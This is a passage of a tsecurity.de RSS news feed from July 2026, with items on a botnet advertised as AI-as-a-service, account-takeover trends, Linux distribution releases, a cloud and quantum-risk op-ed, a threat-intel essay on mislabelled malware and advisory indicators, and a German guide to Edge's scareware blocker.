yourself for the AI era means closing the gap between detecting that something has gone wrong and restoring the systems that were affected, before the cost of that gap compounds."</p><hr><p><i>Sponsored articles are content produced by a company that is either paying for the post or has a business relationship with VentureBeat, and they’re always clearly marked. For more information, contact </i><a href="mailto:sales@venturebeat.com"><i><u>sales@venturebeat.com</u></i></a><i>.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mycelium Framework – First-Ever Know Botnet as an AI-as-a-Service]]></title>
<description><![CDATA[A new cybercrime advertisement is turning heads in the security community, and for good reason. It describes a botnet that does not just infect computers, it turns them into rented artificial intelligence power for other criminals to use. The framework, called Mycelium, is sold on an underground ...]]></description>
<link>https://tsecurity.de/de/3654506/it-security-nachrichten/mycelium-framework-first-ever-know-botnet-as-an-ai-as-a-service/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654506/it-security-nachrichten/mycelium-framework-first-ever-know-botnet-as-an-ai-as-a-service/</guid>
<pubDate>Wed, 08 Jul 2026 15:53:11 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A new cybercrime advertisement is turning heads in the security community, and for good reason. It describes a botnet that does not just infect computers, it turns them into rented artificial intelligence power for other criminals to use. The framework, called Mycelium, is sold on an underground forum as a package for breaking into machines […]</p>
<p>The post <a href="https://cybersecuritynews.com/mycelium-framework-first-ever-know-botnet/">Mycelium Framework – First-Ever Know Botnet as an AI-as-a-Service</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Wolfbox MF60 electric air duster might be the best cheap office gadget you never knew you needed — if you hate buying cans of compressed air as much as me, it's essential]]></title>
<description><![CDATA[110,000 RPM, 3-speed control, USB-C rechargeable, and a kit of nozzles]]></description>
<link>https://tsecurity.de/de/3654289/it-nachrichten/the-wolfbox-mf60-electric-air-duster-might-be-the-best-cheap-office-gadget-you-never-knew-you-needed-if-you-hate-buying-cans-of-compressed-air-as-much-as-me-its-essential/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654289/it-nachrichten/the-wolfbox-mf60-electric-air-duster-might-be-the-best-cheap-office-gadget-you-never-knew-you-needed-if-you-hate-buying-cans-of-compressed-air-as-much-as-me-its-essential/</guid>
<pubDate>Wed, 08 Jul 2026 14:33:15 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[110,000 RPM, 3-speed control, USB-C rechargeable, and a kit of nozzles]]></content:encoded>
</item>
<item>
<title><![CDATA[Distribution Release: deepin 25.2.0]]></title>
<description><![CDATA[The DistroWatch news feed is brought to you by TUXEDO COMPUTERS.  The deepin project has published a new release of its Debian-based distribution. The new version, deepin 25.2.0, includes several desktop improvements and security updates: "Treeland Desktop Environment Upgrade: Treeland stability ...]]></description>
<link>https://tsecurity.de/de/3654280/unix-server/distribution-release-deepin-2520/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654280/unix-server/distribution-release-deepin-2520/</guid>
<pubDate>Wed, 08 Jul 2026 14:31:42 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The DistroWatch news feed is brought to you by <a href="https://www.tuxedocomputers.com/">TUXEDO COMPUTERS</a>.  The deepin project has published a new release of its Debian-based distribution. The new version, deepin 25.2.0, includes several desktop improvements and security updates: "Treeland Desktop Environment Upgrade: Treeland stability and usability have been significantly improved, with over 20 fixes for stability and high-frequency interaction issues. It also....]]></content:encoded>
</item>
<item>
<title><![CDATA[The Verification Step Is the New ATO Battleground in 2026]]></title>
<description><![CDATA[For years, account takeover (ATO) followed a predictable script. Attackers bought stolen credentials in bulk, ran them through automated tools, and waited for matches. Credential stuffing was cheap, scalable, and for defenders, relatively well understood.

That era is ending. Not because attacker...]]></description>
<link>https://tsecurity.de/de/3654215/it-security-nachrichten/the-verification-step-is-the-new-ato-battleground-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654215/it-security-nachrichten/the-verification-step-is-the-new-ato-battleground-in-2026/</guid>
<pubDate>Wed, 08 Jul 2026 14:08:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For years, account takeover (ATO) followed a predictable script. Attackers bought stolen credentials in bulk, ran them through automated tools, and waited for matches. Credential stuffing was cheap, scalable, and for defenders, relatively well understood.

That era is ending. Not because attackers gave up, but because the front door finally got harder to kick in.

Passkeys are now mainstream.]]></content:encoded>
</item>
<item>
<title><![CDATA[Searching for the perfect cheap laptop to take to college? Here are our top recommendations — all tried and tested by our computing experts]]></title>
<description><![CDATA[Any of these affordable laptops would a make stellar study buddy at college or university.]]></description>
<link>https://tsecurity.de/de/3654101/it-nachrichten/searching-for-the-perfect-cheap-laptop-to-take-to-college-here-are-our-top-recommendations-all-tried-and-tested-by-our-computing-experts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654101/it-nachrichten/searching-for-the-perfect-cheap-laptop-to-take-to-college-here-are-our-top-recommendations-all-tried-and-tested-by-our-computing-experts/</guid>
<pubDate>Wed, 08 Jul 2026 13:18:19 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Any of these affordable laptops would a make stellar study buddy at college or university.]]></content:encoded>
</item>
<item>
<title><![CDATA[AI changed our cloud strategy. Quantum changes the questions behind it]]></title>
<description><![CDATA[The strangest thing about cloud strategy is how confident it looks in PowerPoint and how nervous it feels in real life.



I’ve sat in rooms where the cloud slide looked clean enough to frame. Public cloud here. Private cloud there. Hybrid for the awkward middle child. Multi-cloud for resilience,...]]></description>
<link>https://tsecurity.de/de/3654083/it-security-nachrichten/ai-changed-our-cloud-strategy-quantum-changes-the-questions-behind-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3654083/it-security-nachrichten/ai-changed-our-cloud-strategy-quantum-changes-the-questions-behind-it/</guid>
<pubDate>Wed, 08 Jul 2026 13:08:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The strangest thing about cloud strategy is how confident it looks in PowerPoint and how nervous it feels in real life.</p>



<p>I’ve sat in rooms where the cloud slide looked clean enough to frame. Public cloud here. Private cloud there. Hybrid for the awkward middle child. Multi-cloud for resilience, bargaining power and the faint hope that no single vendor would ever own our sleep.</p>



<p>Then AI arrived.</p>



<p>At first, it looked like another conversation about workload. Bigger compute. More storage. Faster experiments. Some awkward cost questions. Nothing we couldn’t absorb with a thicker roadmap.</p>



<p>Then the bills landed. The data moved in odd ways. Teams built things before governance could find its shoes. Vendors became more central than anyone had admitted.</p>



<p>The old cloud strategy didn’t collapse. It blushed. AI exposed the assumptions beneath it.</p>



<p>Now, quantum changes something deeper. It asks whether the decisions behind the workload can survive time, secrecy, suppliers, weak evidence and uncertainty.</p>



<p>That’s a much less comfortable meeting.</p>



<h2 class="wp-block-heading">Cloud strategy was built for workloads we thought we understood</h2>



<p>For years, cloud strategy was a sensible debate about location, cost, control and speed. Public cloud for scale. Private cloud for sensitive workloads. Hybrid cloud for compromise. Multi-cloud for resilience, negotiation or, if we’re being honest, organizational politics with a nice diagram.</p>



<p>The logic was sound. Move faster. Cut heavy infrastructure spend. Improve recovery. Give developers what they need before they grow old waiting for a server. It worked because the work behaved in familiar ways. Systems had owners. Costs had patterns. Data had borders, or at least we pretended it did.</p>



<p>The question was simple: Where should this workload live? That question still matters. But it no longer carries enough weight.</p>



<p>AI changed that. AI changed the pattern, not just the platform AI didn’t politely join the cloud strategy. It wandered through the house, opened every cupboard and asked why the plumbing sounded tired.</p>



<p>The first shock was demand.</p>



<p>Traditional systems consume resources in ways you can usually model. AI workloads behave differently. Training, testing, inference and data processing can spike, pause, restart and spread before anyone has agreed on who owns the meter.</p>



<p>Cloud cost control used to ask a billing question, “How much will we use?” AI asks an operating question: “Who is allowed to create demand, at what scale, for what purpose and with whose approval?”</p>



<p>The second shock was data.</p>



<p>AI does more than store data. It chews it, reshapes it, remembers parts of it, produces new versions of it and leaves traces in places people forget to check. Prompts, logs, embeddings, model outputs, copied files and forgotten notebooks can become quiet risk pockets.</p>



<p>A cloud strategy that only asks where data sits misses how data behaves.</p>



<p>The third shock was supplier dependency.</p>



<p>Many firms thought they had a cloud strategy. AI revealed they had a supplier dependency strategy wearing a cloud badge. GPUs, model platforms, managed services, specialist APIs and third-party tools became central to delivery.</p>



<p>AI compressed the distance between idea and exposure. A team could test, connect and release faster than governance could form a working group. I say that with affection. I’ve seen working groups age in dog years.</p>



<p>Cloud strategy had become a test of decision speed, risk appetite, financial discipline and data control. It now goes beyond architecture.</p>



<p>Then quantum changed the clock.</p>



<h2 class="wp-block-heading">Quantum changes the time horizon</h2>



<p>Quantum risk often gets dumped into the cryptography drawer. That is understandable. It is also dangerous.</p>



<p>The leadership issue adds time to the future of quantum computers.</p>



<p>Some data stolen today may still matter years from now. Some secrets age badly. Trade secrets, legal records, health data, source code, identity data and sensitive contracts don’t all expire at the same speed. Some decay like fruit. Some sit like plutonium.</p>



<p>That is why “harvest now, decrypt later” matters. An attacker may collect encrypted data today and wait for better tools tomorrow. You don’t need to panic. You do need to ask which data has a long secrecy life.</p>



<p>If your most sensitive long-lived data spans cloud platforms, SaaS services, backups, archives, collaboration tools and supplier systems, where exactly is your quantum exposure? Which encryption protects it? Who manages the keys? Which supplier has a plan? Which one has a brochure?</p>



<p>A brochure is a scented candle for anxious executives.</p>



<p>Migration also takes time. Cryptography hides everywhere. In applications. In identity systems. In network devices. In APIs. In firmware. In backup tools. In old systems, nobody wants to touch.</p>



<p>Quantum readiness goes beyond a weekend patch. It is discovery, classification, design, testing, contracts, funding, sequencing and proof.</p>



<p>The risky sentence is, “We’ll revisit this when things become clearer.”</p>



<p>By then, the cheap decisions may have left the building.</p>



<h2 class="wp-block-heading">The real issue is decision infrastructure</h2>



<p>AI exposed assumptions about speed, cost, data and suppliers. Quantum exposes timing, ownership, evidence and memory. Together, they point to a quieter weakness: decision infrastructure.</p>



<p>By decision infrastructure, I mean the system by which leaders frame risk, assign ownership, make trade-offs, record choices, track evidence and revisit assumptions when facts change. That sounds dull. Good. Dull is where serious governance lives. The glamorous stuff gets applause. The dull stuff prevents regret.</p>



<p>Many organizations saw the risk and still failed because too many people saw different pieces of it, and nobody owned the decision. The cloud team sees architecture. Security sees exposure. Legal sees liability. Procurement sees contract gaps. Finance sees cost drift.</p>



<p>The board sees amber. Amber is often where hard decisions go to nap.</p>



<p>This is why AI and quantum belong in the same leadership conversation. AI asks whether your cloud strategy can keep pace. Quantum asks whether it can cope with time. Both punish vague ownership.</p>



<p>Who owns long-term cryptographic exposure? Who can force a supplier conversation? Who accepts residual risk if migration cannot happen fast enough? Who records why a decision was made and when it must be reviewed?</p>



<p>Suppose those questions feel awkward, good. Awkward questions earn their rent.</p>



<h2 class="wp-block-heading">The questions leaders should ask now</h2>



<p>The board needs better questions.</p>



<p>Start with exposure. What protects your most sensitive systems and data? Where do you rely on supplier-managed encryption? Which systems are old, critical, poorly documented and painful to change?</p>



<p>Exposure is a map of assets, data, dependencies and time.</p>



<p>Then ask about ownership. Who owns quantum readiness across cloud, cyber, legal, procurement, privacy, resilience and the business? Who can make trade-off decisions when risk reduction competes with cost and delivery? Which risks are stuck because everyone is involved and nobody is accountable?</p>



<p>Awareness without ownership is just anxiety with better stationery.</p>



<p>Then ask about evidence. Can you show progress by system, supplier, business service and data class? Would your evidence survive a board review, a regulator’s questioning or a post-incident investigation?</p>



<p>Evidence built under pressure is expensive. It is also sweaty. Build the proof trail before the room gets hot.</p>



<p>Finally, ask about timing. Which choices must be made now because migration will take years? What event would trigger faster action? When will the board revisit the risk?</p>



<p>Which delay would you regret if the timeline moves faster than expected?</p>



<p>That last question matters. Regret is often the most honest risk metric in the room.</p>



<h2 class="wp-block-heading">What a quantum-aware cloud strategy looks like</h2>



<p>A quantum-aware cloud strategy is not a glossy side document owned by three cryptographers and a nervous intern.</p>



<p>It is a cloud strategy with better questions built into it:</p>



<ol class="wp-block-list">
<li><strong>Build cryptographic visibility.</strong> Start with the services that matter most. Find the encryption, certificates, protocols, keys, libraries and suppliers that protect them. Perfection can wait. Blindness cannot.</li>



<li><strong>Classify data by secrecy life.</strong> Not just sensitivity. Time. How long must this information stay protected? A short-lived report and a long-life trade secret do not belong in the same queue.</li>



<li><strong>Press suppliers for evidence.</strong> Ask what they are doing, what you must do and how they will prove progress. Confidence is lovely. Evidence pays the rent.</li>



<li><strong>Rank migration by risk.</strong> Start where business value, long-life data, weak visibility and migration pain meet. Treating everything as equal is how serious work becomes theatre.</li>



<li><strong>Change board reporting.</strong> Don’t report quantum as a foggy science project. Report decisions required, risks accepted, blockers, supplier gaps and review dates. Boards govern choices. Give them choices.</li>



<li><strong>Build a review rhythm.</strong> Standards, tools, suppliers, threats and regulations will continue to evolve. A stale roadmap is just a risk register wearing a lab coat.</li>
</ol>



<p>No panic. Panic burns energy and produces bad slides. The aim is readiness with owners, evidence and judgment.</p>



<h2 class="wp-block-heading">The cloud question grew up</h2>



<p>Cloud strategy began as an architecture question.</p>



<p>AI turned it into an operating question. Quantum turns it into a leadership question.</p>



<p>That is the shift.</p>



<p>To handle this well, organizations will need to build decision muscle early. They will know what matters, who owns it, what evidence exists, which suppliers are ready and when the next decision must be made.</p>



<p>But beneath cloud, AI and quantum sits the discipline leaders often avoid until pressure arrives, wearing a suit: decision quality.</p>



<p>AI changed the cloud bill. Quantum changes the clock.</p>



<p>And the clock is where risk hides.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[My threat feed told me it was ‘Chalubo.’ The binary disagreed]]></title>
<description><![CDATA[I’ve spent two years doing incident response and threat intel, and the one habit I’d keep if I had to give up every other is also the most boring. I don’t act on a piece of intelligence until I’ve checked it against the thing it claims to describe. It’s slow. It’s tedious. Almost nobody does it, ...]]></description>
<link>https://tsecurity.de/de/3653754/it-security-nachrichten/my-threat-feed-told-me-it-was-chalubo-the-binary-disagreed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653754/it-security-nachrichten/my-threat-feed-told-me-it-was-chalubo-the-binary-disagreed/</guid>
<pubDate>Wed, 08 Jul 2026 11:09:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I’ve spent two years doing incident response and threat intel, and the one habit I’d keep if I had to give up every other is also the most boring. I don’t act on a piece of intelligence until I’ve checked it against the thing it claims to describe. It’s slow. It’s tedious. Almost nobody does it, because checking costs the exact time the feed was supposed to save. So, we read the report, nod and move on. That works fine most weeks. The weeks it doesn’t are the ones I remember, and the one I keep coming back to started with a feed that sounded completely sure of itself and had it backwards.</p>



<h2 class="wp-block-heading">A cluster the feed got wrong</h2>



<p>I was mapping infrastructure behind a loader operation, sweeping a single service port through a commercial platform. It handed back a cluster of hosts; all tagged the same thing: Chalubo RAT. The tag didn’t stop me. The metadata did. Every host in the cluster carried one first-seen date, down to the day.</p>



<p>Real infrastructure never looks that clean. Operators stand hosts up a few at a time, over weeks, whenever they get to it. A whole cluster sharing one first-seen date almost always means you’re looking at the day the feed’s pipeline ingested the batch, not the day anyone actually saw those hosts live. So now I had two things I didn’t trust: The family name and the too-perfect date. Easiest way to settle it was to close the feed and go look at the malware.</p>



<p><a href="https://news.sophos.com/en-us/2018/10/22/chalubo-botnet/">Chalubo</a> is a Linux botnet. It brute-forces SSH and throws DDoS traffic. What I had in front of me was a Windows shellcode loader, a DonutLoader variant, the kind of thing that sits at the front of a ransomware intrusion. Different platform, different job. Calling one the other isn’t a near miss. It’s a category error.</p>



<p>So, I detonated it in an isolated lab, captured the traffic, mapped the C2 and pulled the config. It spoke a protocol of its own: Payload delivery on one custom channel, a steganographic beacon on a second, across a ten-host cluster, with a config format that had nothing to do with Chalubo. The reason for the bad tag turned out to be dull. The feed’s rule for that port keyed on the port plus a loose pattern, my loader tripped it and the label propagated across the whole batch with the ingest date stapled on.</p>



<p>This isn’t a knock on the vendor. Fingerprinting malware families across the entire internet is genuinely hard. The damage starts one step later, with whatever the reader does with that tag. Believe it, and you spend the week hardening against a Linux DDoS botnet while a Windows ransomware precursor sits quietly on your network. Wrong threat. Wrong priorities. The feed didn’t just come up empty. It pointed the response in the wrong direction, with total confidence and a familiar logo on it. Nothing about the tag looked wrong. The file was the only thing that said otherwise.</p>



<h2 class="wp-block-heading">The same gap, in a federal advisory</h2>



<p>For a while I filed this as a commercial-feed problem, the tax you pay for buying intel from a vendor cutting corners at scale. Then the same shape turned up in one of the best sources any of us get for free.</p>



<p>Earlier this year I spent some time inside the joint FBI and CISA <a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a">advisory</a> on Ghost, or Cring depending on who’s naming it, a ransomware crew that’s hit organizations in seventy-plus countries. Like everyone, I opened the PDF first. Its indicator table is literally headed “MD5 File Hashes”: 14 samples, each pinned to an MD5 and nothing else. MD5’s been broken for years. It’s the whole reason detection moved to SHA-256, and an MD5-only indicator doesn’t drop cleanly into half the tooling defenders actually run.</p>



<p>Then I opened the other copy of the same advisory. It doesn’t only ship as a PDF. There’s a machine-readable STIX bundle too, the format built to feed straight into a TIP or a SIEM. Same advisory, same code, different file. Six of those fourteen samples carried SHA-256 in the STIX, with SHA-1 and fuzzy hashes next to them, none of it in the PDF table. The stronger indicators were in the official release the entire time, sitting in the file almost nobody opens. Read the PDF like most people do, and you walk away with weaker detections than whoever opened the STIX, and nothing tells you there’s a difference.</p>



<p>That same bundle cut the other way too, and this is the part worth slowing down on. Down in its relationships sat a threat-actor object naming APT41, Winnti, Wicked Panda, wired to several of the Ghost indicators. The advisory’s text never says APT41. It goes out of its way to call the attribution “variable over time.” Pull on the thread and it falls apart: No vendor has ever tied Ghost to APT41, and the object looks like automated enrichment, not a human analyst’s call. The STIX isn’t lying to you. The problem is subtler. Feed it into your TIP and you’ve quietly inherited a nation-state attribution nobody actually made. One file was missing good data. The other was carrying data nobody vetted. You only catch either by looking.</p>



<p>And it’s not a one-country quirk. A while later I reversed a Go backdoor, GAMYBEAR, the one UAC-0241 pointed at Ukrainian schools and state bodies, documented in a CERT-UA <a href="https://cert.gov.ua/article/6286219">advisory</a>. Good report. It nailed the behavior. But the actual loader gave up more than fifteen binary-level corrections to what the advisory had: A persistence mechanism attributed to the wrong component, a broken TLS implementation and a handful of indicators that only held once I checked them against the real sample instead of the writeup. That’s the kind of detail that keeps a detection alive after the operator renames the file. Commercial vendor. Federal agency. Foreign CERT. Three sources, all accurate, all carrying something other than the full truth in the copy most people read.</p>



<h2 class="wp-block-heading">What I do differently now</h2>



<p>The lesson wasn’t trust intelligence more or trust it less. It’s narrower than that. An indicator is a claim, and a claim gets checked before you stake a defense on it, most of all when it’s the advisory covering your own organization, because that’s the one whose blind spots quietly become yours. It’s cheap enough to make routine. If I were standing up a detection program next week, three things would be in from day one.</p>



<p>Treat any automated family label as a guess until something specific backs it. A row of identical first-seen dates is a fact about a pipeline, not a record of an attack. When an advisory ships in more than one format, open the machine-readable copy and don’t stop at the PDF, because the structured file tends to hold both the stronger indicators and the unvetted ones, and you want to see both. And for anything that actually matters, run a live sample through your own stack before you call it covered. The gap between an indicator and a detection that fires is exactly where attackers like to live.</p>



<p>I still reach for all three kinds of source every week, and I’ll defend every one of them. They were never the problem. The checking was always the cheap part. Assuming I could skip it was the expensive one. A report is where the work starts. Not where it stops.</p>



<p>The full teardowns behind these three cases are published on GitHub: The <a href="https://github.com/yankywilson/donutcluster-AS138995">DonutLoader protocol analysis</a>, the <a href="https://github.com/yankywilson/ghost-cring-defender-toolkit">Ghost detection content</a> and the <a href="https://github.com/yankywilson/gamybear">GAMYBEAR reversing notes and rule</a>, each in its own repository.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So aktivieren Sie den Scareware-Blocker in Microsoft Edge]]></title>
<description><![CDATA[Der Edge-Browser in Microsoft enthält einen Scareware-Blocker, der jedoch eventuell zunächst aktiviert werden muss. Unter Scareware (to scare = erschrecken) versteht man Webseiten, die versuchen, dem Besucher einen Schreck einzujagen und ihn in seiner Panik zu bestimmten Handlungen zu bewegen.


...]]></description>
<link>https://tsecurity.de/de/3653379/windows-tipps/so-aktivieren-sie-den-scareware-blocker-in-microsoft-edge/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653379/windows-tipps/so-aktivieren-sie-den-scareware-blocker-in-microsoft-edge/</guid>
<pubDate>Wed, 08 Jul 2026 08:08:36 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Der Edge-Browser in Microsoft enthält einen Scareware-Blocker, der jedoch eventuell zunächst aktiviert werden muss. Unter Scareware (to scare = erschrecken) versteht man Webseiten, die versuchen, dem Besucher einen Schreck einzujagen und ihn in seiner Panik zu bestimmten Handlungen zu bewegen.</p>



<p>Typisch sind etwa sich plötzlich im Vollformat öffnende Seiten, die falsche Virenwarnungen ausgeben oder auf gefährliche Sicherheitslücken hinweisen, die es tatsächlich nicht gibt. Oft ertönen dabei laute Alarmsignale oder es erscheinen simulierte Systemmeldungen.</p>



<p>Das Ziel der Betrüger hinter der Scareware ist, dass der Benutzer eine Schutzsoftware herunterlädt (bei der es sich tatsächlich jedoch um einen Virus handelt) oder einem angeblichen Experten einen Remote-Zugang zu seinem Computer öffnet. Der Scareware-Blocker von Edge arbeitet mit KI, um solche Fake-Seiten zu identifizieren und Sie vor dem Besuch zu warnen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a4de95769bd5"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/scareware_RGBeci.jpg?quality=50&amp;strip=all" alt="Scareware-Blocker in Microsoft Edge " class="wp-image-3141138" width="892" height="768" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Der Scareware-Blocker in Microsoft Edge ist auf den meisten Computern bereits in der Voreinstellung aktiv und warnt vor dem Besuch von Websites, die den Besucher mit Alarmmeldungen zu unüberlegten Handlungen verleiten sollen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Diese Analyse erfolgt rein lokal, es werden keine Screenshots oder andere Bilder des eigenen Computers an Microsoft übermittelt. Was allerdings übermittelt wird, sind die Adressen dieser Seiten. Sie gehen an den Microsoft Defender Smartscreen, eine Datenbank, die Nutzer bereits bei der Eingabe der Adresse einer gefährlichen Webseite auf die Risiken hinweist.</p>



<p>Auf den meisten Windows-PCs ist der Scareware-Blocker in der Voreinstellung aktiviert. Sie finden ihn in Edge nach einem Klick auf das Zahnradsymbol rechts unten unter „Datenschutz, Suche und Dienste –› Sicherheit“. Mit dem Schalter bei „Scareware-Blocker“ aktivieren und deaktivieren Sie die KI-Analyse der Funktion.</p>



<p>Mit „Websites blockieren, die als Betrug erkannt wurden“ steuern Sie, ob bereits bekannte betrügerische Websites blockiert werden sollen. Und mit „Erkannte Betrugswebsites mit Microsoft Defender Smartscreen teilen“ erlauben Sie das Übermitteln der Adresse einer Scareware-Seite an Microsoft.</p>



<p>Die Funktion ist aktiv auf allen Computern, die über mehr als 2 GB Arbeitsspeicher und eine CPU mit mindestens fünf Kernen verfügen. Bei allen anderen PCs muss der Scareware-Blocker zuerst eingeschaltet werden. Bei PCs mit weniger als 1 GB RAM und nur einem CPU-Kern ist er nicht verfügbar.</p>



<p><strong>Lesetipp: </strong><a href="https://www.pcwelt.de/article/1161670/die-besten-gratis-tools-antivirus.html" target="_blank" rel="noreferrer noopener">Die besten Gratis-Tools gegen Viren und Malware</a></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[TUXEDO Computers is switching the base of TUXEDO OS from Ubuntu to Debian for greater stability and control.]]></title>
<description><![CDATA[submitted by    /u/mr_MADAFAKA   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3653117/linux-tipps/tuxedo-computers-is-switching-the-base-of-tuxedo-os-from-ubuntu-to-debian-for-greater-stability-and-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653117/linux-tipps/tuxedo-computers-is-switching-the-base-of-tuxedo-os-from-ubuntu-to-debian-for-greater-stability-and-control/</guid>
<pubDate>Wed, 08 Jul 2026 04:25:43 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/mr_MADAFAKA"> /u/mr_MADAFAKA </a> <br> <span><a href="https://www.reddit.com/r/tuxedocomputers/comments/1upndpc/a_new_foundation_for_tuxedo_os_switching_to_debian/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1upu346/tuxedo_computers_is_switching_the_base_of_tuxedo/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[TUXEDO OS drops Ubuntu to rebase on Debian Testing]]></title>
<description><![CDATA[TUXEDO Computers is rebasing TUXEDO OS on Debian, moving away from Ubuntu. The German Linux hardware company launched TUXEDO OS in 2022, building on top of an Ubuntu long-term support (LTS) release to, chiefly, support its own hardware with customisations, though the distro is free to download an...]]></description>
<link>https://tsecurity.de/de/3653023/linux-tipps/tuxedo-os-drops-ubuntu-to-rebase-on-debian-testing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3653023/linux-tipps/tuxedo-os-drops-ubuntu-to-rebase-on-debian-testing/</guid>
<pubDate>Wed, 08 Jul 2026 02:52:31 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="406" height="232" src="https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/ubuntu-in-the-shredder.webp?resize=406%2C232&amp;ssl=1" class="attachment-post-list size-post-list wp-post-image" alt="Paper with Ubuntu logo being fed into a paper shredder." decoding="async" fetchpriority="high" srcset="https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/ubuntu-in-the-shredder.webp?resize=350%2C200&amp;ssl=1 350w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/ubuntu-in-the-shredder.webp?resize=406%2C232&amp;ssl=1 406w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/ubuntu-in-the-shredder.webp?resize=840%2C480&amp;ssl=1 840w, https://i0.wp.com/www.omgubuntu.co.uk/wp-content/uploads/2026/07/ubuntu-in-the-shredder.webp?zoom=3&amp;resize=406%2C232&amp;ssl=1 1218w" sizes="(max-width: 406px) 100vw, 406px">TUXEDO Computers is rebasing TUXEDO OS on Debian, moving away from Ubuntu. The German Linux hardware company launched TUXEDO OS in 2022, building on top of an Ubuntu long-term support (LTS) release to, chiefly, support its own hardware with customisations, though the distro is free to download and install on any machine. To keep things fresh, TUXEDO updates web browsers, GPU graphics drivers and the Plasma desktop continuously, but leaves the underlying Ubuntu LTS base intact. Now, after almost four years of taking that approach, TUXEDO’s had enough. Why TUXEDO OS is dropping Ubuntu TUXEDO list a number of reasons […]</p>
<p>You're reading <a href="https://www.omgubuntu.co.uk/2026/07/slug-tuxedo-os-debian-rebase">TUXEDO OS drops Ubuntu to rebase on Debian Testing</a>, a blog post from <a href="https://www.omgubuntu.co.uk/">OMG! Ubuntu</a>. Do not reproduce elsewhere without permission.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anonymous Wild Hornets spokesperson calls drone swarms 'a fun legend and a scam mechanism' as he defends the critical importance of 3D printers in warfare]]></title>
